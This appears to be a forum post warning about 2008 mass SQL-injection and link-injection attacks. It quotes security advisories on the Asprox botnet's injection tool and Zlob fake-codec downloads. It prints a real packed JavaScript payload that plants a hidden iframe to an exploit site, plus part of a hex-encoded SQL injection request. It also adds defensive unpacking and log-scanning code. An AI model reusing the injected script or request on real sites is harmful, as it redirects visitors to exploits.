Someone is going around attacking most web pages
You can lock this post, idk, I just want to warn you guys cuz this hack edits the links on the site and sends you to another site. My site and many, many others got attacked. Here I found this on what happened. (I'm just trying to warn and help you guys out. I'm not trying to do anything bad.)
There have been a lot of discussions going on about these injection attacks. The one thing in common so far has been that the culprits are abusing security vulnerabilities in various web applications, mainly SQL injection.
Exploiting such vulnerabilities became relatively easy (since there are many vulnerable applications that use similar backend logic), so the bad guys started releasing various tools that enable them to compromise sites automatically. I analyzed one such tool at http://isc.sans.org/diary.html?storyid=4294, which was probably used for a lot of SQL injection attacks we have seen lately (but be aware that other similar tools exist and are actively used in the underground; one such tool in use with botnets was analyzed by Joe at SecureWorks, http://www.secureworks.com/research/threats/danmecasprox/).
The motive for this is more or less standard: steal credentials or virtual goods so you can convert/sell them for real money (Mike and Steven from Shadowserver posted very nice articles at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507 and http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080513). But while analyzing one such site today I saw an interesting rant, presumably by the author.
The site has already been mentioned multiple times (www.ririwow.cn, which appears to be finally taken down). The majority of attacks actually pointed to this site which happily served some exploits to the end user. However, this time the main index.htm file had this text appended at the bottom:
"This is a mass invasion. Safeguard the motherland's dignity!
F*** FRANCE! F*** CNN! I WILL ATTACK you ALWAYS !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com "
(language edited)
Interesting. While this could have been added by anyone, I found another interesting thing thanks to a heads up from our friend Paul from pauldotcom.com. Paul analyzed a compromised site which had this piece of JavaScript inserted:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8(b.e==\'i-2\'){}4{3.g("<9 d=7://h.c.2/a.6 f=1 5=0></9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}))
After deobfuscating the code, we get this:
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://www.ririwow.cn/index.htm width=100 height=0></iframe>");}
In other words, the code checks whether the system language variable is set to ZH-CN (which is the case on systems running in Chinese) and redirects you to the site hosting the exploit only if that is not true. So the rant might really be from the author after all, since the code attacks all non-Chinese machines. Are things getting more serious, or is the bottom line still (and only) information stealing and money?
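The packed script above can be read without ever running it. The following is an added example (mine, not code from the ISC diary, pauldotcom or the page): a static unpacker that rebuilds the token-to-keyword table the packer's e() function would build and substitutes the keywords back into the payload, instead of handing the result to eval(). It is written for the general case (any payload, radix, count and keyword list of this packer family), and is shown here on the four arguments copied from the sample above, with the spaces inside the iframe tag restored where the forum wrapped the line.

```javascript
// Added example: static (no eval) unpacker for "p,a,c,k,e,d" style scripts.
// Works for any packed script of this family; the sample is the one quoted on the page.

// Encode a dictionary index exactly the way the packer's e() function does:
// base-36 digits for 0..35, then uppercase letters via fromCharCode(c + 29) for 36..61.
function encodeIndex(c, radix) {
  const rem = c % radix;
  const head = c < radix ? '' : encodeIndex(Math.floor(c / radix), radix);
  const tail = rem > 35 ? String.fromCharCode(rem + 29) : rem.toString(36);
  return head + tail;
}

// Replace every \w+ token in the payload with its dictionary entry.
// Tokens with no entry are left untouched (the packer itself would emit "undefined").
function unpackPacked(payload, radix, count, keywords) {
  const table = {};
  for (let c = 0; c < count; c++) {
    const token = encodeIndex(c, radix);
    table[token] = keywords[c] || token; // same fallback the packer uses: k[c] || e(c)
  }
  return payload.replace(/\b\w+\b/g, (tok) =>
    Object.prototype.hasOwnProperty.call(table, tok) ? table[tok] : tok);
}

// The four arguments of the injected sample, copied from the page.
const SAMPLE_PAYLOAD =
  '8(b.e==\'i-2\'){}4{3.g("<9 d=7://h.c.2/a.6 f=1 5=0></9>");}';
const SAMPLE_RADIX = 62;
const SAMPLE_COUNT = 19;
const SAMPLE_KEYWORDS =
  '|100|cn|document|else|height|htm|http|if|iframe|index|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'
    .split('|');

// Returns the readable script: the language check plus the hidden iframe.
function unpackSample() {
  return unpackPacked(SAMPLE_PAYLOAD, SAMPLE_RADIX, SAMPLE_COUNT, SAMPLE_KEYWORDS);
}

console.log(unpackSample());
```

Run it with node; the output is the if/else line shown above. The replace() callback is the whole trick: the packer's own final step is the same \w+ substitution, it just gets there via eval, so reproducing that step in plain code gives the analyst the same text without executing anything the attacker wrote.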
More info
Danmec is a password-stealing trojan which has been around for a couple of years, but in the last year new components have been introduced by the author, turning it into a more complete crimeware family. One of these components (developed last year) is the Asprox trojan, which is designed to create a spam botnet which appears to be solely dedicated to sending phishing emails. As of yesterday, we observed the Asprox botnet pushing an update to the infected systems, a binary with the filename msscntr32.exe. The executable is installed as a system service with the name "Microsoft Security Center Extension", but in reality it is a SQL-injection attack tool.
When launched, the attack tool will search Google for .asp pages which contain various terms, and will then launch SQL injection attacks against the websites returned by the search. The attack is designed to inject an iframe into the website source which will force visitors to download a javascript file from the domain direct84.com. This file in turn redirects to another site, where additional malicious javascript can be found. Currently the secondary site appears to be down, however it is likely that when successful, the site attempts to exploit the visitor's web browser in order to install additional copies of either Danmec, Asprox and/or the SQL attack tool.
Because the tool is distributed by the botnet, it may appear to be worm-like in its operation, which may lead to conflicting reports in the media and blogs about the true nature of the attack. However, the SQL attack tool does not spread on its own, it relies on the Asprox botnet in order to propagate to new hosts. Additionally, a similar attack technique is currently being seen spreading game-password-stealing trojans from China. Whether the tool is related or just the attack syntax is shared, it is clear that SQL injection attack activity is on the rise from multiple sources.
The initial HTTP requests used by the msscntr32.exe attack tool will appear similar to the following:
GET /page.asp?id=425;DECLARE%20@S%20NVARCHAR(4000);SET%20
@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C00410052004500200www.example.com HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25
Host: www.example.com
Connection: Close
Note the use of both Firefox and Opera in the User-Agent string. This could be an effective means to block the attack in the short term, since User-Agent ACLs are built into most modern web servers. However, this is not likely to stay constant.
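Both observations above (the hex-encoded CAST(0x...) payload in the request and the contradictory Firefox/Opera User-Agent) can be turned into a quick log check. The following is an added example of mine, not SecureWorks' code or anything from the page: it pulls the request path out of combined-format web server log lines, decodes the CAST hex as UTF-16LE (the tools build an NVARCHAR string, so every character is two bytes), and separately flags the odd User-Agent. The two log lines are constructed for the demonstration; the hex in the second one is the UTF-16LE encoding of "DECLARE @T varchar(255)", i.e. the prefix of the request quoted above.

```javascript
// Added example: decode hex-encoded T-SQL from CAST(0x...) in web logs and flag it.
// Sample lines are constructed for this demonstration.
const SAMPLE_LOG = [
  // constructed: ordinary request for the same page
  '203.0.113.5 - - [01/May/2008:10:00:01 +0000] "GET /page.asp?id=425 HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Windows NT 5.1) Gecko/20060728 Firefox/1.5.0"',
  // constructed: injection attempt; the hex is UTF-16LE for "DECLARE @T varchar(255)"
  '198.51.100.7 - - [01/May/2008:10:00:02 +0000] "GET /page.asp?id=425;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630068006100720028003200350035002900%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25"',
];

// Decode a CAST(0x...) blob. NVARCHAR means the bytes are UTF-16LE.
function decodeHexPayload(hex) {
  return Buffer.from(hex, 'hex').toString('utf16le');
}

// Extract and URL-decode the request path from a combined-format log line.
function requestPath(line) {
  const m = line.match(/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  try {
    return decodeURIComponent(m[1]);
  } catch (e) {
    return m[1]; // malformed %-escapes: inspect the raw path instead of dropping the line
  }
}

const HEX_CAST = /CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR/i;

// Returns { path, decoded } for a line carrying a hex-encoded CAST payload, else null.
function analyzeLine(line) {
  const path = requestPath(line);
  if (!path) return null;
  const m = path.match(HEX_CAST);
  if (!m) return null;
  return { path, decoded: decodeHexPayload(m[1]) };
}

// A real browser never claims to be both Firefox and Opera; the tool's UA does.
// Cheap short-term indicator only: the string is trivial for the attacker to change.
function hasContradictoryUserAgent(line) {
  const m = line.match(/"([^"]*)"$/);
  return !!m && /Firefox\//.test(m[1]) && /Opera/.test(m[1]);
}

// Scan a list of log lines and return every decoded injection attempt.
function scanLog(lines) {
  return lines.map(analyzeLine).filter(Boolean);
}

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log('injection attempt, decoded SQL:', hit.decoded);
}
```

The decoded text is what to alert on and to grep for elsewhere, because the hex blob changes with every variant of the tool while the DECLARE/CAST/EXEC scaffolding and the resulting SQL stay recognisable. Keep the User-Agent check as a secondary signal, as the text says, not as the primary rule.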
Last weekend attackers once again injected a link to malicious JavaScript into hundreds of thousands of websites. The JavaScript redirects visitors to another site that ostensibly contains a video for which the user needs a special codec – but the download is in fact a Trojan of the Zlob family.
According to the Internet Storm Center, most of the contaminated websites contain installations of the phpBB forum. It is not yet clear what vulnerabilities the criminals behind the mass attack exploited. Trend Micro speculates that the sites have poorly configured installations or out of date versions of phpBB that contain security holes. A Google search for the embedded JavaScript currently yields some 200,000 infected websites.
Users who download the "codec" not only get the Zlob Trojan, but also a DNSChanger that sets Windows DNS entries to fake servers which redirect requests for banking sites to the addresses of phishing sites. The phoney codec also downloads additional malicious baggage. Virus scanner detection is patchy. Avast, CA, Gdata, McAfee, NOD32, Panda and Symantec do not yet recognize the virus – more than a third of the virus scanners in the most recent c't virus scanner test
Myspace:http://www.myspace.com/DEATH1sniper
Home Page:http://snipereliteforce.spruz.com/
AMSHNOK!!!